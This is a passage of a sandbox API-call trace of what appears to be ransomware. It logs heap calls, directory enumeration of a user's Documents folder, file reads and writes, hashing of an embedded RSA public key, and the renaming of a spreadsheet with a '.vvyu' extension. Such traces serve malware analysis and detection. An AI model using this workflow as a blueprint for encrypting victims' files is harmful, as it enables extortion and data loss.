Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da78 [0188.921] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da18 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da30 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da90 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da60 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0188.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daa8 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da48 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da60 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da18 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da78 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daa8 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da18 | out: hHeap=0x2c0000) returned 1 [0188.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0188.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da00 | out: hHeap=0x2c0000) returned 1 [0188.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.927] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d9e8 | out: hHeap=0x2c0000) returned 1 [0188.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2968 | out: hHeap=0x2c0000) returned 1 [0188.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.929] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0188.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.930] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x8140, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x8140, lpOverlapped=0x0) returned 1 [0188.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0188.931] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x8145, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.931] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.931] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0188.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0188.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0188.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.932] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0188.933] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.933] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.933] CloseHandle (hObject=0x584) returned 1 [0188.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0188.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0188.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0188.935] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\5usDb JNuS3uVdkW.xlsx" (normalized: "c:\\users\\keecfmwgj\\documents\\5usdb jnus3uvdkw.xlsx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\5usDb JNuS3uVdkW.xlsx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\5usdb jnus3uvdkw.xlsx.vvyu")) returned 1 [0188.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0188.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.936] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.939] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x802f9170, ftCreationTime.dwHighDateTime=0x1d89cbe, ftLastAccessTime.dwLowDateTime=0x4c8902e0, ftLastAccessTime.dwHighDateTime=0x1d8a4f5, ftLastWriteTime.dwLowDateTime=0x4c8902e0, ftLastWriteTime.dwHighDateTime=0x1d8a4f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8NNLi0kOEoM-mpUM785", cAlternateFileName="8NNLI0~1")) returned 1 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbb48 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40580 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40420 [0188.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a405d8 [0188.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a404d0 | out: hHeap=0x2c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a401b8 | out: hHeap=0x2c0000) returned 1 [0188.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0188.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0188.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbb48 | out: hHeap=0x2c0000) returned 1 [0188.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0188.941] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x443caa50, ftCreationTime.dwHighDateTime=0x1d843f3, ftLastAccessTime.dwLowDateTime=0x7cb907c0, ftLastAccessTime.dwHighDateTime=0x1d877b0, ftLastWriteTime.dwLowDateTime=0x7cb907c0, ftLastWriteTime.dwHighDateTime=0x1d877b0, nFileSizeHigh=0x0, nFileSizeLow=0xc02, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="92-ieu- ecANbCAHxu3.pptx", cAlternateFileName="92-IEU~1.PPT")) returned 1 [0188.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2968 [0188.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0188.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2968 | out: hHeap=0x2c0000) returned 1 [0188.942] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\92-ieu- ecANbCAHxu3.pptx") returned=".pptx" [0188.942] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\92-ieu- ecANbCAHxu3.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\92-ieu- ecanbcahxu3.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.942] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=3074) returned 1 [0188.942] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.947] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xbdc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.947] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.949] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.949] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xc02, lpOverlapped=0x0) returned 1 [0188.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.949] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.950] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.951] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.951] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.951] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.951] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.951] GetLastError () returned 0x0 [0188.951] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.951] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.952] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.952] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.952] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc00) returned 0x2af1f88 [0188.952] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2968 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d9e8 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae29b0 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da00 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da30 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da48 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0188.953] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0188.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af2b90 [0188.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da30 | out: hHeap=0x2c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da48 | out: hHeap=0x2c0000) returned 1 [0188.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0da90 | out: hHeap=0x2c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2b90 | out: hHeap=0x2c0000) returned 1 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0da90 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0da48 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.954] RtlAllocateHeap (HeapHandle=0x2c0000, 